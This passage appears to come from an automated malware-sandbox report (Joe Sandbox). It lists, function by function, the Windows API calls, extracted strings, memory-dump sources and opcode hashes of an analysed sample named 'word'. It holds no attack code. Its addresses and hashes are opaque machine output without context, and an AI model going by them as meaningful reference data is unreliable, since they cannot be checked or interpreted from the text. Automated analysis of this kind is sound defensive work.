                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                    • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                    • API String ID: 2485709727-934586222
                                                                    • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                    • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                    • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                    • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                    • _memset.LIBCMT ref: 004481BA
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                    • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID: X1
                                                                    • API String ID: 830647256-2397719451
                                                                    • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                    • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                    • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                    • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                    • String ID: HH
                                                                    • API String ID: 3381189665-2761332787
                                                                    • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                    • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                    • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                    • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                    APIs
                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                    • DeleteObject.GDI32(00000000), ref: 0046EB4F
                                                                    • DestroyIcon.USER32(00000000), ref: 0046EB67
                                                                    • DeleteObject.GDI32(4E502F5C), ref: 0046EB7F
                                                                    • DestroyWindow.USER32 ref: 0046EB97
                                                                    • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                    • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                    • String ID: X1
                                                                    • API String ID: 802431696-2397719451
                                                                    • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                    • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                    • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                    • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00434585
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                    • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                    • String ID: (
                                                                    • API String ID: 3300687185-3887548279
                                                                    • Opcode ID: 0eab341c51f1147eeab38a1c8c92a42c293e71a02ddf466eb3b8759c193f6d97
                                                                    • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                    • Opcode Fuzzy Hash: 0eab341c51f1147eeab38a1c8c92a42c293e71a02ddf466eb3b8759c193f6d97
                                                                    • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                    • __swprintf.LIBCMT ref: 0045E4D9
                                                                    • _printf.LIBCMT ref: 0045E595
                                                                    • _printf.LIBCMT ref: 0045E5B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString_printf$__swprintf_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                    • API String ID: 3590180749-2894483878
                                                                    • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                    • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                    • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                    • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                    • LoadImageW.USER32 ref: 0046F929
                                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                    • DeleteObject.GDI32(?), ref: 0046F950
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                    • LoadImageW.USER32 ref: 0046F9A8
                                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                    • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                    • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                    • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                    • DeleteObject.GDI32(?), ref: 0046FA68
                                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                    • String ID:
                                                                    • API String ID: 3412594756-0
                                                                    • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                    • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                    • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                    • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                    APIs
                                                                      • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 4013263488-4113822522
                                                                    • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                    • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                    • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                    • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                    • String ID:
                                                                    • API String ID: 228034949-0
                                                                    • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                    • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                    • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                    • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004334F4
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00433533
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00433541
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0043354F
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                    • CopyImage.USER32 ref: 004335DB
                                                                    • DeleteObject.GDI32(?), ref: 00433603
                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3969911579-0
                                                                    • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                    • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                    • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                    • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00445A8D
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                    • __wcsicoll.LIBCMT ref: 00445AC4
                                                                    • __wcsicoll.LIBCMT ref: 00445AE0
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 3125838495-3381328864
                                                                    • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                    • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                    • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                    • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CopyVariant$ErrorLast
                                                                    • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 2286883814-4206948668
                                                                    • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                    • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                    • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                    • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                    APIs
                                                                      • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                    • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                    • _wcscpy.LIBCMT ref: 00475F18
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                    • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                    • API String ID: 3052893215-4176887700
                                                                    • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                    • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                    • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                    • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                    APIs
                                                                      • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                    • SendMessageW.USER32(750A0E13,00001001,00000000,00000000), ref: 00448E73
                                                                    • SendMessageW.USER32(750A0E13,00001026,00000000,00000000), ref: 00448E7E
                                                                      • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                    • String ID: X1
                                                                    • API String ID: 3771399671-2397719451
                                                                    • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                    • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                    • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                    • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                    APIs
                                                                    • StringFromIID.OLE32(?,?), ref: 004582E5
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • CoTaskMemFree.OLE32(?), ref: 00458335
                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00458351
                                                                    • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                    • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                    • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                      • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                    • String ID: Version$\TypeLib$interface\
                                                                    • API String ID: 656856066-939221531
                                                                    • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                    • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                    • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                    • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                    APIs
